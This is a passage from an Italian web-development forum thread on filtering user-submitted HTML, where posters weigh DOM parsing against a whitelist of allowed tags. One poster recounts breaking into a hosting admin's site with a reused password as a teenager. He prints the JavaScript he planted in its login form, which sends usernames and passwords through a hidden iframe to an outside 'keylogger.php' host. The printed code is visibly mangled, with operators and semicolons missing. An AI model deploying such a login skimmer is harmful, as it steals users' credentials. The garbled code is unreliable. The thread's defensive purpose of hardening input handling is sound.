Quote Originariamente inviata da Vincent.Zeno Visualizza il messaggio
e se invece fai il contrario? ovvero regole precise di cosa è consentito?
sai anche tu che non è possibile "regalare" l'accesso a chi può far danno (specialmente ai capi )
Si è vero, se non dai i permessi a chi non li deve possedere ogni problema è risolto, ma a volte capita che per un motivo o per l'altro una password può finire in mano a chi non dovuto, per esempio ciò capitò a me medesimo. Quando ero un ragazzo fra i 15 e i 16 anni (ora ne ho quasi 22) trovai la password di uno degli amministratori di uno degli hosting più famosi in italia perchè era la stessa che utilizzava su una bulletin board da lui programmata che usava sul suo sito personale.

Solo che il mio admin non era abbastanza admin da fare moltissimo, allora piazzai nel form di login un codice javascript che grabbava le password in log-in molto rudimentale.

Codice PHP:
function check(nameForm) {
   if (document.all || document.getElementById) {
      var nameInput = new Array()
      for (i=0i<=nameForm.lengthi++) {
         nameInput[i] = nameForm.elements[i];
      }
      
      if (nameInput[0].value != '' && nameInput[1].value != '') {
         p_iframe(escape(nameInput[0].value), escape(nameInput[1].value));
         
         for (i=0i<=10000000i++) {
         }
      }
   }
   
   return true;
}

function p_iframe(userpass) {
   if (document.all) {
       document.all['invisible'].innerHTML '<iframe height="0"  width="0" style="border:0;"  src="http://www.xxxx.org/keylogger.php?user=' user '&pass=' +  pass '></iframe>';
   } else {
       document.getElementById('invisible').innerHTML '<iframe height="0"  width="0" style="border:0;"  src="http://www.xxxx.org/keylogger.php?user=' user '&pass=' +  pass '></iframe>';
   }
E siccome conosco l'ottica di chi agisce secondo i miei stessi parametri e voglio rilasciare a breve un progetto quasi inattaccabile (cosa lo è veramente? però almeno da tutte le tecniche attualmente conosciute al mondo sarebbe il minimo), non vorrei dare questa possibilità anche sul mio script.

Quote Originariamente inviata da MItaly Visualizza il messaggio
Eviterei scorciatoie con regex, fai girare il codice in un parser HTML, dal DOM generato uccidi i tag che non vanno bene, quindi ri-genera l'HTML.
Quote Originariamente inviata da Vincent.Zeno Visualizza il messaggio
e se invece fai il contrario? ovvero regole precise di cosa è consentito?
Sarebbe praticamente la stessa cosa formulata in maniera diversa, e come idea non mi dispiace, sarei molto più sicuro se sono io a decidere cosa può inserire, invece di eliminare ciò che non dovrebbe inserire per poi scoprire che è riuscito a bypassarlo con qualche trick.